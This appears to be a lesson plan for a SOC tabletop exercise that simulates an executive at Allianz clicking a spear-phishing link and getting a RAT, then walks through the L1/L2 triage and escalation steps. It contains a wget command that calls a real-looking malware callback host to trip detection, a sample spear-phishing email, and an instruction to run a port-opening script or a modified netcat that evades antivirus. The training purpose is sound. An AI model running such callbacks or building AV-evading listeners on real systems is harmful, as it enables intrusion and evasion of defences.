Lesson 2 of 5
In Progress

Roles in Table Top Excercise (TTX)

Roles in the TTX

[Jithin Varghese] – [India] – L1: responsible for the triage of the event to incident.

[Name] – L2: very experienced with an understanding of how to do deep forensics work

[Name] – Incident Coordinator: person who manages the response to an elevated priority security incident.

[Stefan] – SOC Manager: who needs to have the feedback from the systems to know how the business is doing, what incidents have been managed and where the business is in the overall security posture, as well as how this information is delivered back to the rest of the organization.

[Marc] – End User Affected (EUA): who clicks on the fake link and purposely fake the infection.

[Dirk] – OE IT Help Desk:  person answers the phone call.

Stefan/Tobias/David/Marc/et all – will explain the initial stage/purpouse at the beginning of the session.

Setting the ‘overall’ stage (5 Minutes)

This section provides the story for setting the stage for the demo. The demo shows a day in the life of Allianz’s SOC.

Objective of the TTX:

  • Simulate real life incident in the Allianz SOC
  • Demonstrate phased approach to incident response
  • Demonstrate collaboration across functional roles and geographically disperse teams
  • Demonstrate measureable success
  • Intelligence Driven Decisions

This demo shows also the people, processes and technology that are involved in the Security Operations Center across different geo.

Stefan/Tobias/David/Marc/et all need to explain also what the key needs of the Security Operations Center are:

  • Business context that allows Allianz’s analysts to make the best decision given the information they have.
  • Efficient tools that take the analyst to complete understanding of an incident in the shortest amount of time in order to make decisions quickly.
  • The ability to capture metrics about the process to show the rest of the organization the effectiveness in this key area, the protection of the business.

Setting the stage: ‘Process’ (3 Minutes)

Stefan/Tobias/David/Mark describe all the incident response processes that are currently implemented in the SOC:

  • L1 Event Triage
  • L1 Customer Playbook
  • L1 Daily Checklist
  • L2 Response
  • L2 Live Response

Setting the stage: ‘People’ (3 Minutes)

Stefan/Tobias/David/Mark describe the roles that are currently working in the SOC and why they have been staffed using a tiered approach. Also briefly explain how many people are actually working on it and their experience.

Setting the stage: ‘Technology’ (3 Minutes)

Stefan/Tobias/David/Mark describes what kind of technologies we will see and how this will be orchestrated


Tobias/David describes briefly the kill chain:

And explain at high level the overall incident:

  • Executive-User in M&A clicks on phishing link in email that was customized to him/her.
  • Allianz SOC’s threat detection tool “FireEye” generates an alert and sends to ArcSight when link attempts to call back to C2.
  • The alert lists a piece of malware intended for an end user laptop. Upon event triage, the end user laptop belongs to high value target.
  • Further analysis determines the malware has been associated with a documented campaign through intelligence sharing and aggregation portal.
  • This poses a critical risk eluding to a targeted attack with sophisticated threat actors behind the keyboard.

Detailed Story

EUA opens the mailbox; checks the emails and he will see a new mail. The URL contains a link to pdf. The EUA, knows the subject and will click the link. IE will be opened showing the pdf. The EUA will continue to read the document and the laptop will continue to work normally. At that point the moderator tells the story that through a vulnerability in Acrobat a RAT was downloaded and installed on the users machine in the background. FireEye detected it, but let it through and notified ArcSight who send the event to a Level 1 Analyst. The Level one Analyst opens the Event/Incident and starts his triage/initial investigation steps according to the Wiki (that we can show); during his initial triage he routinely finds out that an Executive from M&A is involved and seemingly his physical machine got infected.



set http_proxy=http://REAL_username:REAL_password@wwwproxy.bank.dresdner.net:8080/

\\WWG00M.ROOTDOM.NET\DFS\HOME\REAL_username\ICM\Desktop\wget\wget.exe –referer=”http://www.domain.com/Allianz.pdf” –user-agent=”Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” -T1 -t1 http://kolort.ru/18v4vzlqad0pv996ydq90ybf8824g5lncsp7?fr=adtop&rand=32390

(Find a link that makes FireEye triggered or as an alternative use FireEye’s test link)

Note: wget.exe must be downloaded on the workstation. The above commands will make FireEye triggered as it contacts a malware callback.

[Define the Workstation that will be used during the session]

[Define what to show on the screen/projector]

[Agree on the body of the email]

Phishing Email

Hello John,

Per our discussion, we would like to start discussing a buyout at the price of 8.12 US Dollars per share. This will encompass a leveraged buyout for Allianz insurance and its subsidiaries. Allianz is prepared to assume all liability and debt. The details of the leveraged buyout can be found in the attachment.


Please contact us if you have any account issues.

[Define the email address of the EUA]

[Define the email sender]


  1. Just before the session starts, launch the malicious_script on the workstation that EUA uses. This will make FireEye triggered. Write a script that open a port or use a modified version of netcat that is not detected by the AV.

Demonstrating the L1 Analyst Activities (5 Minutes)

L1 opens SecOps console.

L1 check the queue and see a new event/incident in SecOps.

L1 double click on the Incident ID on SecOps.

L1 will change Incident Status from New to Progress and assign to himself the incident.

L1 will start to triage the incident, open the website: https://ind-wiki.allianz.de.awin/display/SecurityAnalyst/L1+Event+Triage and begins the triage (using ArcSight too).

[Insert Here the Screenshots of Secops here for the L1 benefits]

L1 also will update the classification of the incident using SecOps.

L1 will assign the threat category using SecOps

L1 realizes that this is a High incident due the infected machine that belongs to a VIP employee (through the event triage procedure they learn about the VIP).

L1 runs the Live Response script on the machine and send it to L2

L1 escalates to L2 via phone call

Demonstrating the L2 Analyst Activities (5 Minutes)

L2 updates the Incident Owner and will start the analysis of the incident record in SecOps.

L2 starts the investigation of the machine analyzing the results of the LR script

L2 investigating the LR’s output and he finds out that port 22 is open in a windows machine and confirms the incident and exfiltration is happening

Containment and Eradication phase (2 Minutes)

Incident Coordinator contacts AMOS IT (HP) Helpdesk through communications plan informing about the compromised system and also contacts the EUA to inform about the situation.

L2 reviews incident details, populates incident record lessons learned details.

Lesson Learned Detail (2 Minutes)

L2 populates After Action Report (AAR).